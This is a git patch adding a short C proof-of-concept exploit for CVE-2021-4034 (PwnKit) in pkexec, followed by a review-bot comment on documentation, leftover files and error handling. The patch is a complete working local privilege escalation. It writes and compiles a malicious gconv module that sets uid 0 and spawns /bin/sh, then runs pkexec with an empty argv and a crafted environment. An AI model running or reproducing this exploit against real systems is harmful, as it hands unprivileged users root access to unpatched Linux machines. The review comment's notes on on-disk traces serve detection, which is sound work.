From 282f5160c69b776051740f8649416f7220a0f556 Mon Sep 17 00:00:00 2001
From: Andris Raugulis
Date: Wed, 26 Jan 2022 00:59:53 +0000
Subject: [PATCH] Add simple CVE-2021-4034 PoC
---
 cve-2021-4034-poc.c | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cve-2021-4034-poc.c
diff --git a/cve-2021-4034-poc.c b/cve-2021-4034-poc.c
new file mode 100644
index 0000000..b274108
--- /dev/null
+++ b/cve-2021-4034-poc.c
@@ -0,0 +1,27 @@
+#include
+#include
+#include
+
+char *shell =
+ "#include \n"
+ "#include \n"
+ "#include \n\n"
+ "void gconv() {}\n"
+ "void gconv_init() {\n"
+ " setuid(0); setgid(0);\n"
+ " seteuid(0); setegid(0);\n"
+ " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+ " exit(0);\n"
+ "}";
+
+int main(int argc, char *argv[]) {
+ FILE *fp;
+ system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+ system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+ fp = fopen("pwnkit/pwnkit.c", "w");
+ fprintf(fp, "%s", shell);
+ fclose(fp);
+ system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+ char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
+ execve("/usr/bin/pkexec", (char*[]){NULL}, env);
+}
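Review bot: The new file has no header comment stating what it demonstrates and what it leaves on disk, which a reader of a checked-in PoC needs more than the code itself; a block comment at the top of cve-2021-4034-poc.c should say that main() stages a `GCONV_PATH=.` directory and a `pwnkit/` directory (with a gconv-modules file and a gcc-built pwnkit.so) in the current working directory and then execs `/usr/bin/pkexec` with an empty argv under a hard-coded environment. It should also spell out that the `rm -rf 'GCONV_PATH=.' 'pwnkit'` cleanup lives inside gconv_init() in the embedded source, so whenever execution does not reach gconv_init() — a pkexec that is not affected, or a failed gcc step — those two directories remain behind, which is exactly the on-disk trace an incident responder should look for. The hard-coded pkexec and gcc paths are presumably deliberate for a minimal PoC, but each deserves a one-line `/* assumes ... */` comment, and the fopen() of pwnkit/pwnkit.c is used without a NULL check, so a read-only working directory turns into a crash on the following fprintf() rather than an error message.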